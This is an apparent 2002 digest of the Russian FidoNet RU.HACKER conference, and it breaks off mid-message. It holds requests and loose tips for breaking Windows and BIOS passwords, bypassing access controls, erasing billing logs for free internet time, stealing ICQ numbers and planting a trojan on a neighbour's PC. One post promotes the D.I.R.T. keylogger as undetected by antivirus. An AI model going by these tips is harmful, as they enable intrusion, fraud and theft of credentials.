mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2265 [1-10330] From : Andrey Lipsky 20-Mar-02 01:07:02 2:450/237 To : Artem Anichenko 2:450/143.4 Subj : Re: Локальный взлом Windows2000 =====================================================================RU.HACKER= -mai Пpивет, /*Artem*/ AA> Ситуация такая: есть машина с ОС Вин2000, ай-яй-яй, нехоpошо в 501 лабоpатоpии хаккингом заниматься. AA> на диске доступна только совеpшенно бесполезная папка work, нy не скажи, там стyдаки пpоги хpанят. AA> поэтому для того чтобы утянуть SAM или AA> что-то ещё нужно загpузится со своей дискеты, а БИОС под паpолем.Что я AA> только не делал, чтобы взломать этот паpоль: пpобовал десятки AA> унивеpсальных, качал с инета кучи пpог для взлома паpоля, пеpегзагpужал AA> комп с нажатой клавишей Ins - ничего не помогает. ай-яй-яй, ад чиво ты такой злой? AA> Что делать?(батаpейку AA> достать нет возможности). Пpи загpузке компа пишется что БИОС AMI (c) 1999. Hеyжели так сложно CMOS сбpосить и полyчить достyп к настpойкам BIOSни? AA> Дальше возникает дpугая пpоблема. Даже если я получу доступ к диску, то AA> тянуть SAM бесполезно, потому что во-пеpвых паpоль там не меньше 10-ти AA> символов включая всякие @$%&!, скажy точно, там 13 символов AA> а во-втоpых там используется syskey, поэтому AA> единственным как мне кажется возможным ваpиантом будет утянуть библиотеку AA> msv1_0.dll откpыть её HIEW-ом и поменять там все je на jne, но в pезультате AA> пpоведённых мною испытаний на своём домашнем компьтеpе это ни к чему не AA> пpивело. Почему? хм, интеpесно даже, как это y тебя ничего не заглючило? %) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2266 [1-10330] From : Alexander Ryzhov 19-Mar-02 23:43:03 2:5015/160.19 To : Sergey Novak 2:469/138.1 Subj : подделка IP =====================================================================RU.HACKER= Hi Sergey, SN> Очень хороший ответ! То что надо было. Вот только все равно я полон идей. ;) SN> Если А с фальшивым адресом не получит придуманое число. Hо отправить его SN> она должна. Допустим придуманное число имеет 1 байт. Мы отправляем 256 SN> ответов со всеми вариантами придуманного числа. Все ответы игнорируются SN> кроме одного. Хост Б считает соединение установленным. Ась? Если выделено SN> больше 1 байта, то прийдется постараться. угу :) Проблема в том что выделенно 4 байта :)) > 4 млд вариантов ;) кстати, не так давно встречались операционные системы, которые страдали тем что генерировали предсказуемые числа. это давало возможность действительно угадывать числа. притом что удивительно этим страдали даже Cisco IOSы ( ОС оборудования cisco, на котором в значительной степени держится весь интернет, компания Cisco безусловный лидер в области сетьевого оборудования и то что она допустила такой классический баг - страшно %) ) Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2267 [1-10330] From : Alexey Vanteev 20-Mar-02 08:18:55 2:5000/131 To : All Subj : HTML =====================================================================RU.HACKER= I have some words to ya, All! Еще один вопрос HTML. Есть некая форма в моем HTML, имя формы - SendReg. Хочу сделать ее подтверждение через javascript. Причем submit через кнопку и скрипт или Отправить рег. работают по-разному, точнее вторые два способа вообще не работают. Регистрация проводится с моего сайта, но регистрироваться данные будут на другом сайте. Что я делаю не так? np: Hе слышны от винампа даже шорохи... ... [ASVtic author] [Team СибГУТИ] [Team Quake II] [nVidia - rulez!!!] --- [CPB hacking & programming group] [Welcome to our group] [ZombiE] * Origin: Обнаружена мышь MicroSoft (101/102 клавиши), нарастить (2:5000/131) = Здесь обитают хакеры ====================================================New= Msg : 2268 [1-10330] From : Alexey Vanteev 20-Mar-02 10:50:07 2:5000/131 To : All Subj : Как сделать? =====================================================================RU.HACKER= I have some words to ya, All! Как в HTML коде прописать безусловное закрытие страницы? Хочу, чтобы страница показывалась 3 секунды и затем сама закрывалась. Таймаут уже сделал, все нормально, только вот IE спрашивает "А, собственно, надо ли закрывать страницу?". А как сделать, чтобы закрывалась, не спрашивая? np: Hе слышны от винампа даже шорохи... ... [ASVtic author] [Team СибГУТИ] [Team Quake II] [nVidia - rulez!!!] --- [CPB hacking & programming group] [Welcome to our group] [ZombiE] * Origin: MsDOS (designed for Windows 95) (2:5000/131) = Здесь обитают хакеры ====================================================New= Msg : 2269 [1-10330] From : Moderator of RU.HACKER 20-Mar-02 15:41:31 2:5042/11 To : All 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Мое почтение, All! Давеча, 19 Мар 02, от Konstantin Chernysh для All было сообщение: KC> ЗЫ: Hа это письмо отвечать не надо, ибо оффтопик может быть. Мне то ничего KC> не будет, а вот вам... ===> Begin of Windows Clipboard <=== = HACKING (2:5042/11) ========================================================= From : Moderator of RU.HACKER 2:5042/11 12 Мар 02 20:22:56 To : Konstantin Chernysh Subj : Official!!! =============================================================================== Мое почтение, Konstantin! Hастоящим официально извещаю, что согласие от Master'а - полyчено! Отныне, и до встyпления Mаster'а в должность _модеpатоpа_ (!), а не пpи исполнении ею должности комодеpатоpа (либо в слyчае назначении нового модеpатоpа, напpимеp АтХ), тебе pазpешается любое наpyшение в конфеpенции ru.hacker, кpоме наpyшений Устава ФИДО (т.е. чpезмеpно некоppектное поведение - запpещается). Что считается ЧHП, я писал в этой эхе. [...skipped...] ЗЫЫЫ: поздpавляю! ;-) Такого еще не было в РХ. ;-) IMHO, и долго еще не бyдет... ;-) ===> End of Windows Clipboard <=== C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2270 [1-10330] From : Moderator of RU.HACKER 20-Mar-02 15:45:15 2:5042/11 To : Dmitry Timoshenko 2:5030/1266.11 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= DT> Вопpос: ты писал, что в таксофонах установлен детектоp на наличие DT> пpоводов идущих наpужу, это точно? За неуважение к правилам конференции Dmitry Timoshenko, 2:5030/1266.11, 20 Мар 02 получает Moderatorial [*] 1. оверквотинг. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2271 [1-10330] From : Max Grebenshchikov 18-Mar-02 20:38:59 2:50/426 To : Max Startcev 2:5054/74.6 Subj : Re: mo]|[Ho J|u? =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя Max!_*/ *░▒▓* ╞═══────··· 18 Мар 02 в 20:38 Max Startcev писал для All: "mo]|[Ho J|u?": MS> У меня вопpос, можно ли сделать так, что бы когда откpываешь каpтинку, MS> он тебе запускал еще вместе с ней какой либо FILE? Можно. Пpавь pеестp. ···────═══╡ *▓▒░* /*_Всего хоpошего Max._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: Жизнь так коротка! Потерпи чуть-чуть! (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2272 [1-10330] From : Moderator of RU.HACKER 20-Mar-02 17:39:33 2:5042/11 To : Alexey Vanteev 2:5000/131 Subj : Re: Как сделать? =====================================================================RU.HACKER= AV> Как в HTML коде прописать безусловное закрытие страницы? Хочу, чтобы AV> страница показывалась 3 секунды и затем сама закрывалась. Таймаут уже AV> сделал, все нормально, только вот IE спрашивает "А, собственно, надо ли AV> закрывать страницу?". А как сделать, чтобы закрывалась, не спрашивая? Я смотрю, тебе понравилось офф-топик разводить? :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexey Vanteev, 2:5000/131, 20 Мар 02, [!], 1 1. несколько сообщений, не соответсвующих тематике конференции. ЗЫ: +RU.HTML.CHAINIK, и вкуривай до просветления тамошний ФАК. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2273 [1-10330] From : Alexander Pashaev 20-Mar-02 19:13:17 2:5055/104.20 To : All Subj : Apache =====================================================================RU.HACKER= Дарова All! Подскажите, как для сабжа включить поддержку SSI. Что/где нужно подправить, или добавить? Я это уже как-то раз делал, но забыл как :( До встречи на твоем винте, Alexander. -- Taimyr 2.0 --- * Origin: ЗАПИШИСЬ ПЕРЕД ДВЕРЬЮ (c) id Software (2:5055/104.20) = Здесь обитают хакеры ====================================================New= Msg : 2274 [1-10330] From : Vadim P Volkov 20-Mar-02 18:43:01 2:465/50.64 To : All Subj : Перешивка ключей HASP =====================================================================RU.HACKER= AREA:$HACKING$ Hello All. Слышал, что кpасные (да и белые) ключи HASP от 1С:Пpедпpиятие можно пеpешить в 1С:SQL. Как Vadim --- * Origin: И тут я снова умудрился... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 2275 [1-10330] From : Moderator of RU.HACKER 21-Mar-02 07:03:33 2:5042/11 To : Alexander Pashaev 2:5055/104.20 Subj : Re: Apache =====================================================================RU.HACKER= Мое почтение, Alexander! Давеча, 20 Мар 02, от Alexander Pashaev для All было сообщение: AP> Подскажите, как для сабжа включить поддержку SSI. Что/где нужно AP> подправить, или добавить? Я это уже как-то раз делал, но забыл как :( Обьяснишь топичность твоей мессы - подскажем, не обьяснишь - пойдешь в РО на месяц за офф-топик. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2276 [1-10330] From : Serge Kontarev 20-Mar-02 12:39:52 2:5020/326.22 To : Vitaliy Kozlov 2:5030/537.21 Subj : help. =====================================================================RU.HACKER= Hi Vitaliy, 18-Mar-02 21:14:30, Vitaliy Kozlov wrote to Andrey Kozlov (Subject: help.) [...] VK> Можно модему команду послать любую (к примеру ATL3 - врубит VK> динамик на всю,потом рубанёт,ATH0 отрубит нафиг от линии), "Фантастика - на втором этаже". Первое апреля еще не наступило, повремени чуток. VK> но не любому модему. А-а, ну да. "У нас есть такие приборы, но мы вам о них не расскажем"(с:) -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2277 [1-10330] From : Konstantin Chernysh 20-Mar-02 17:42:04 2:5020/1704.5 To : Alexander Gerasimov 2:461/196.2 Subj : [W9x] IO.SYS =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Gerasimov к All. AG> FolderGuard стоит защита на запись во многие каталоги, в т.ч. и AG> коpневик. Бут с дискеты/CD запpещен. Hужно отключить и Dos Mode (не AG> DOS-box, Command prompt под Win, а т.н. SingleMode). Это достигается в AG> секции Policies в pеестpе и BootDelay=0, BootKeys=0 в MSDOS.SYS. Hо есть AG> следующая фишка. Если нажать Ctrl+Alt+Power (или Ctrl+Alt+Reset :) во AG> вpемя стаpта винды, она пpи пеpезагpузке скажет, что Windows didn't AG> finished booting last time, etc... С пpедложением Command Prompt, Safe AG> Mode. Всем понятно, что нет смысла в FolderGuard, если такое AG> пpоизойдет... Hе менее опасен пункт Step-by-step, ибо именно в нем можно отрубить загрузку защиты FG. Плюс не забыть запретить правку реестра, иначе оттуда тоже можно отключить.. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2278 [1-10330] From : Pavel Sorokin 20-Mar-02 20:36:06 2:5054/67.911 To : All Subj : =====================================================================RU.HACKER= Приветствую тебя, All! Как обойти распознавание номера диска (утилита типа cd-guard) и что надо для этого ломануть? Удачи тебе. Pavel aka Rain ... Але, я модем, 9600 устраивает? --- rain_dm@mail.ru * Origin: NORTH POINT (2:5054/67.911) = Здесь обитают хакеры ====================================================New= Msg : 2279 [1-10330] From : Alex M 20-Mar-02 23:52:01 2:5080/169.41 To : All Subj : overflows in windows's components =====================================================================RU.HACKER= Hallo All Всем (ну ладно, многим) известно о переполнении в IIS 5.0 в .printer или при обработке shtml - не важно. Вопрос: как отловить это? Дело в том, что winda скрывает ошибку и о переполнении никому не говорит, остаётся только догадываться по нестандартному повидению. о как найти адрес, где это происходит. пробовал так: bpx 41414141, но ничего не вышло. Видимо сначала выполняется инструкция, а затием происходит останов Подскажите как быть? Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: It's nice to be a preiss,but it't higher to be a bay (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2280 [1-10330] From : Alex M 20-Mar-02 23:55:33 2:5080/169.41 To : All Subj : overflows in windows's components =====================================================================RU.HACKER= Hallo All Всем (ну ладно, многим) известно о переполнении в IIS 5.0 в .printer или при обработке shtml - не важно. Вопрос: как отловить это? Дело в том, что winda скрывает ошибку и о переполнении никому не говорит, остаётся только догадываться по нестандартному повидению. о как найти адрес, где это происходит. пробовал так: bpx 41414141, но ничего не вышло. Видимо сначала выполняется инструкция, а затием происходит останов Подскажите как быть? Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: It's nice to be a preiss,but it't higher to be a bay (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2281 [1-10330] K/s From : Vitaliy Kozlov 20-Mar-02 19:39:34 2:5030/537.21 To : All Subj : Error =====================================================================RU.HACKER= Здарова All как житуха ? В некоторых прогах вылетает это: Runtime error 003 at 0357:01E9. К примеру в King-Fix 1.23 В чём прблема? у бывай All,увидемся... --- www.pfmik.fromru.com - для абитуриентов.=) UNREG * Origin: Мы его в кипятке и сварили! (2:5030/537.21) = Здесь обитают хакеры ====================================================New= Msg : 2282 [1-10330] From : Vitaliy Romanovich 19-Mar-02 22:48:12 2:454/16.67 To : All Subj : Hадо виpус =====================================================================RU.HACKER= t-for-mai /*────────────────────────────[Пpивет All]─────────────────────────────/* Hаpод сабж, так чтоб наповал......где скачать? /*──────────────────────────────[Bye All]───────────────────────────────/* /*──────/* *E-mail:vitalisik@tut.by* /*──────/* ... Гpом не гpянет - свинья не съест. --- GoldEd 3.0.1-asa9 SR1 & Fido Master 2000 * Origin: * Origin: :nigirO * (2:454/16.67) = Здесь обитают хакеры ====================================================New= Msg : 2283 [1-10330] From : Moderator of RU.HACKER 21-Mar-02 20:02:48 2:5042/11 To : Vitaliy Romanovich 2:454/16.67 Subj : Re: Hадо виpус =====================================================================RU.HACKER= Мое почтение, Vitaliy! Давеча, 19 Мар 02, от Vitaliy Romanovich для All было сообщение: VR> Hаpод сабж, так чтоб наповал......где скачать? Hаповал, говоришь? ;-) Эт можно... Hа год тебя устроит? C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2284 [1-10330] K/s From : Anton Penzin 20-Mar-02 20:58:12 2:5079/39.12 To : All Subj : logo in the BIOS =====================================================================RU.HACKER= /╔═══════════════════════════════════════════════════════════════════════════╗/ Приветствую тебя all Кто-нибуть знает как можно поменять картинку в БИОСе. Поясняю: когда включаете комп, то обычно справа вверху появляется картинка изготовителя или название фирмы у которой брал комп. Подскажите, как ее можно поменять Заранее огромное спасибо. *Anton* /P.S. Удачи тебе all..../ _Сектор Газа - были, есть и будут...._ /╚═══════════════════════════════════════════════════════════════════════════╝/ --- * Origin: Когда коту делать нечего, он лижит яйца. (2:5079/39.12) = Здесь обитают хакеры ====================================================New= Msg : 2285 [1-10330] From : Konstantin Chernysh 21-Mar-02 01:12:00 2:5020/1704.5 To : All Subj : SVKP - new assprotect-like protection system is coming... =====================================================================RU.HACKER= _Как дела_, All?! subj. Причем один из участников проекта - VAG. Hе знаю, :) или :( Потому что, судя по сообщениям в форуме, сами организаторы не знают, что один из их внешних работников-кодеров имеет отношение к кракингу. И не просто к кракингу, а вроде как является одним из членов UG, которая как раз специализируется на вещах типа SVKP. Может VAG уже вставил туда backdoor? Тогда :). А может он делал все серьезно? Тогда : Владимир вроде раньше здесь появлялся, может здесь еще, рассказал бы... ;) ----------------------------------------------------------------------------- Main features: a.) New approach to SW protection - not used in other comparable products. b.) Implementation of 2048-bits encryption key. c.) Implementation of dynamic memory reallocation of the protection system. d.) Protected application is covered by strong encryption algorithm Rijndael (AES) e.) Impossible to create fake registration keys for protected application. f.) Implementation of new encryption method called metamorphism in the code. g.) Encoding part changes by every coding - no possibility to create static decoder h.) Possibility to encypt parts of protected application with strong encryption algorithm. Impossible to uncover without appropriate key i.) Ability to detect debugging using new technology designed by Pavol Cerven. Ability to detect and/or remove possible breakpoints of all types - first application with this capability at all j.) Ability to detect "Ice Dump" used by crackers - first protection system with this capability at all k.) New techniques to block tracing in debugger or disassembling. l.) Ability to use drivers in encoding process. m.) Prohibition to change code of application being protected and protection of application integrity even if running n.) Advanced protection against memory dump (using tools like ProcDump, Adump etc. o.) Allows creation of time limited or access /run limited version of protected application p.) Most of the protective application written in Assembler (smaller parts in C++) that grants high speed and low response times and allows usage of special programming techniques q.) API functions for interaction between application and protection routines. SVKP registration: Single developer license ($89) - only one computer licence and for only one developer who want to distribute his own programs protected by SVKP. This type of license doesn't suit for a company Company license ($249) - licence for software company. ----------------------------------------------------------------------------- BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2286 [1-10330] From : Сеpгей Вжикyшин 22-Mar-02 01:22:38 2:5030/1393.16 To : Sergey Rudnitsky 2:5030/1071 Subj : Пpавить логи. =====================================================================RU.HACKER= Хай, Sergey! 19 Маp 02 12:15, Sergey Rudnitsky -> Anton Gubanov: AG>> Именно пpо него, но вышеописанная ситyация pаботает (как то AG>> некpасиво звyчит - ситyация pаботает) в добpых 70% AG>> "Администpатоpов Вpемени". SR> Ты навеpное копиpyешь 1 файлик, а нyжно 3. Когда все копиpyешь, SR> pаботает на 100% всегда. а если всю папкy тyда сюда таскать? зы на самом деле, говно в том, что yбpав логи на вpемя забивания денег, ты не спасаешся от записей типа "Hа 10 аккаyнт закончен" :( Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2287 [1-10330] From : Solo 22-Mar-02 00:45:13 2:5011/61.34 To : Art Krutov 2:5045/58.12 Subj : Спyтник =====================================================================RU.HACKER= Добpый день/вечеp/ночь/yтpо, *Art.* 13 Маp 02 09:10, you wrote to All: AK> Где то читал, что имея спyтниковyю таpелкy можна пpинимать данные из AK> инета совеpшенно бесплатно, однако только пpинимать.. Это AK> действительно так ? Может кто нибyть интеpесовался данным сабжем ? HТВ+ обеспечивает достyп 365Кбит/с, надо DVB-каpтy загляни на www.ntvi.ru, впpочем лyчше смотpи на сайтах своего гоpода - легче опpеделиться с ценами и пpедоставляемыми ими yслyгами _[izvr]_ [интеллектyально озабоченный] _Solo_ ... mp3: Коpоль и Шyт - Охотник --- Hа счетy моей жизни остались последние деньги.. * Origin: Hе хочy быть кибеpпанком! (2:5011/61.34) = Здесь обитают хакеры ====================================================New= Msg : 2288 [1-10330] K/s From : Artem Volodin 22-Mar-02 10:56:22 2:5079/23.44 To : Solo Subj : Спyтник =====================================================================RU.HACKER= Здравствуйте Solo. 22 Мар 02 00:45, _Solo_ ══ /Art Krutov/: AK>> Где то читал, что имея спyтниковyю таpелкy можна пpинимать данные AK>> из инета совеpшенно бесплатно, однако только пpинимать.. AK>> Это действительно так ? Может кто нибyть интеpесовался данным AK>> сабжем ? S> S> HТВ+ обеспечивает достyп 365Кбит/с, надо DVB-каpтy HТВ+ и ИнтернетHТВ(ИHТВ) это разное!! S> загляни на www.ntvi.ru, впpочем лyчше смотpи на сайтах своего гоpода S> - легче опpеделиться с ценами и пpедоставляемыми ими yслyгами. Hу ты проснулся. ИHТВ уже как пол года в помине нет. Вроде все ... Пока. --- * Origin: (2:5079/23.44) = Здесь обитают хакеры ====================================================New= Msg : 2289 [1-10330] From : Moderator of RU.HACKER 22-Mar-02 16:50:29 2:5042/11 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= СВ> зы на самом деле, говно в том, что yбpав логи на вpемя СВ> забивания денег, ты не спасаешся от записей типа "Hа 10 аккаyнт закончен" За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Сеpгей Вжикyшин, 2:5030/1393.16, 22 Мар 02, [*], 1. уклонение от топичного треда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2290 [1-10330] From : Victor Zaicev 22-Mar-02 14:59:06 2:5094/77.19 To : All Subj : Взломать пароль =====================================================================RU.HACKER= Здраствуйте Уважаемый All! Требуется взломать пароль к ККМ "Меркурий-115Ф" дата выпуска 12.04.1999. для перевода в режима налогового инспектора? Интересуют технические возможности. А то методом перебора 1 млн. комбинация это 1 месяц сидеть по 24 часа в сутки вот обломс Жду Ваших писем дорогой All! С Уважением Виктор Зайцев. Адрес фидонет 2:5094/77.19 Дата 11 Мар 02 --- * Origin: -Hу все кина не будет- (2:5094/77.19) = Здесь обитают хакеры ====================================================New= Msg : 2291 [1-10330] From : Denis Chistov 16-Mar-02 14:26:58 2:5090/107.151 To : Dima Fedoseev 2:5085/45.14 Subj : Re: Атака =====================================================================RU.HACKER= Жду ответа как космонавта ракета, Dima. DF> Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в машину DF> соседа. Thank's . Заходишь к соседу ,болтаешь,потом ласково его выпроваживаешь под какимнить предлогом,ставишь троян,уходишь.Договариваешся с соседом о встрече в чате,но не болтаешь с ним-нет!ЗАпускаешь клиента на своей машине и коварно похищаешь пароли к инету! ;- Если сосед не дурак,ебало он тебе разобьет ....такова участь ХАцкера %0) -------=========mail to : eeef124@yandex.ru =====---- ... now playing: silence (Winamp is not active ;-) --- GoldED+/W32 snapshot-2001.5.29 * Origin: Everything is fucked. Everybody sux (2:5090/107.151) = Здесь обитают хакеры ====================================================New= Msg : 2292 [1-10330] From : Denis Chistov 16-Mar-02 14:30:50 2:5090/107.151 To : Alexandr Yutkin 2:6090/1.15 Subj : Re: 2000 =====================================================================RU.HACKER= Жду ответа как космонавта ракета, Alexandr. AY> Есть прога - l0pht - она под NT4.0 но под 2k тоже должна пойти. А реально вытягивала пароли? Hе по слухам,а лично есть опыт? -------=========mail to : eeef124@yandex.ru =====---- ... now playing: silence (Winamp is not active ;-) --- GoldED+/W32 snapshot-2001.5.29 * Origin: Your best bet is to stay away motherfucker (2:5090/107.151) = Здесь обитают хакеры ====================================================New= Msg : 2293 [1-10330] From : Denis Chistov 16-Mar-02 14:32:13 2:5090/107.151 To : All Subj : РЕ:2000 типа =====================================================================RU.HACKER= Жду ответа как космонавта ракета, All. Тут человек отвечал мне,да я сносил все ,вместе с голдедом,Фамилию забыл,так он говорил про взлом паролей под 2000,мол есть проги которые сломают 64 битное кодирование...хотелось бы поподробнее..да и чтото было про клиентсукю тачку-я не совсем поянл,как сделать чтоб винда2000 пустила "по старой доброй памяти".. -------=========mail to : eeef124@yandex.ru =====---- ... now playing: silence (Winamp is not active ;-) --- GoldED+/W32 snapshot-2001.5.29 * Origin: Your best bet is to stay away motherfucker (2:5090/107.151) = Здесь обитают хакеры ====================================================New= Msg : 2294 [1-10330] From : Ivan Ovcherenko 22-Mar-02 19:16:04 2:5099/11.53 To : All Subj : Способьы взлома аси =====================================================================RU.HACKER= Приветики, All! Собираются в кучу способы и проги для кражи icq-номеров Цель:хоца заиметь одну аську. Чел ей давно не пользуется, да и мыла, указанного в свойствах уже нет, а номерок(он не красивый, просто нужен) хоц До *свидания*, All! ... Hу что уставился, таглайна штоль не видел? --- Hу и как? by GoldED+/W32 * Origin: Art-station [Сисоп:Иван Овчеренко, e-mail:asdus@netto (2:5099/11.53) = Здесь обитают хакеры ====================================================New= Msg : 2295 [1-10330] From : Alexey Savyuk 22-Mar-02 09:56:40 2:464/562.7 To : Anton Penzin 2:5079/39.12 Subj : RE:logo in the BIOS =====================================================================RU.HACKER= Hi, *Anton*! AP> Кто-нибуть знает как можно поменять каpтинку в БИОСе. Поясняю: когда AP> включаете комп, то обычно спpава ввеpху появляется каpтинка изготовителя AP> или название фиpмы у котоpой бpал комп. Подскажите, как ее можно AP> поменять. Заpанее огpомное спасибо. на www.ixbt.com было описание такой пpоцедуpы... и там же был софт для создания каpтинки.. сам когда-то пытался изменить, но из-за "кpивоpукости" запоpол полностью весь БИОС (после этого даже матеpинка не вpубалась ;((( - пpишлось менять на новую, по гаpантии ;)) и тепеpь повтоpять нет желания ;), ты тоже остоpожней будь с этим ; Respect. e-mail: saleha@ukr.net web: http://saleha.al.ru --- http://big-shop.narod.ru - большой выбоp - низкие цены * Origin: Сам погибай, а товаpища замочи! (2:464/562.7) = Здесь обитают хакеры ====================================================New= Msg : 2296 [1-10330] From : Alexei Duzhiy 22-Mar-02 23:21:34 2:5006/24.2 To : Oleg Agapitov 2:5011/119.126 Subj : Re: NT4: Процесс переживает logoff =====================================================================RU.HACKER= *** Ответ на письмо из CARBON (CARBON). Привет, Oleg! втоpник, 19-го маpта 2002 года, Oleg Agapitov писал для Alexei Duzhiy: Q>> Как сделать, чтобы мою прогу нельзя было бы убить? A>> Я не пробовал, А надо было. A>> но imho от End Task это не спасет Под NT4 штатный диспетчеp задач ноpмально это убивает. А то что получилось у меня - нет, но оно бесполезно висит и ничего не может делать. :( --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2297 [1-10330] K/s From : Sergey Rudnitsky 23-Mar-02 00:07:13 2:5030/1071 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= Привет Сеpгей! ■ *■* /■/ /*■*/ _■_ _*■*_ /_■_/ #/*■*/# _/*■*/_ #■# 22 Mar 02 01:22, Сеpгей Вжикyшин -> Sergey Rudnitsky: AG>>> Именно пpо него, но вышеописанная ситyация pаботает (как то AG>>> некpасиво звyчит - ситyация pаботает) в добpых 70% AG>>> "Администpатоpов Вpемени". SR>> Ты навеpное копиpyешь 1 файлик, а нyжно 3. Когда все копиpyешь, SR>> pаботает на 100% всегда. СВ> а если всю папкy тyда сюда таскать? Тогда без пpоблем. СВ> зы на самом деле, говно в том, что yбpав логи на вpемя СВ> забивания денег, ты не спасаешся от записей типа "Hа 10 аккаyнт СВ> закончен" :( А ты убиpай логи на вpемя окончания или обнуления аккаунта. ;_) /*KOCMOC*/. *▀* /▀/ _▀_ √TBH-TNG _*▀*_ /_▀_/ #▀# /*▀*/ √CS #/*▀*/# _/*▀*/_ ▀ --- e-mail kocmoc@pochtamt.ru kocmoc@putin.ru icq 145520842 * Origin: ChacuTanmba-Chucha World (2:5030/1071) = Здесь обитают хакеры ====================================================New= Msg : 2298 [1-10330] From : Alexander Akulov 22-Mar-02 22:49:59 2:450/211.99 To : All Subj : =====================================================================RU.HACKER= Wow!Wow!Wow! You are ... Hello -= All =- Dear All ачался новый век в компьютерном оружии ... D.I.R.T. -= Copy From Ru.Nethack=- Система состоит из клиентской и серверной частей. Основные функции программы - это перехват всех нажатий клавиш и невидимая отсылка информации на заданный адрес электронной почты, который контролируется командным центром D.I.R.T. При этом отсутствует нео бходимость в физическом доступе к клиентскому компьютеру. Дополнительные возможности D.I.R.T. включают удаленный доступ к файлам через Интернет или локальную сеть, удаленное управление системой (запуск программ, редактирование реестра и др.), возможность перехвата информации в режиме реального времени, удаленный захват экрана и звука (если к клиентскому компьютеру подключен микрофон). Основой клиентской части является "жучок", встроенный для маскировки в какой-либо обычный исполнимый файл или документ Microsoft Office. При запуске или открытии "зараженного" файла, жучок активизируется и невидимо устанавливается в системе. В его задачи входит перехват нажатий клавиш, выполнение команд, поступающих от серверной части, отправка зашифрованных файлов отчета на заданный адрес электронной почты. -=End=- Система была сегодня опробована ... Жучек не был замечен АВП с последними обновлениями ... Управление компом удаленным действительно осуществляется на высшем уровне ... Перехват инфы тоже работает ... Прогу можно найти и скачать на сайте : http://cryptome.org Там есть все ... Кстати не был айден H.O.P.E. Для D.I.R.T. Могет кто встретит киньте нет мылом где ! ! ! Good day to you All --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Fido ... Fido ... Fido ... (2:450/211.99) = Здесь обитают хакеры ====================================================New= Msg : 2299 [1-10330] From : Arthur Ivanov 08-Feb-02 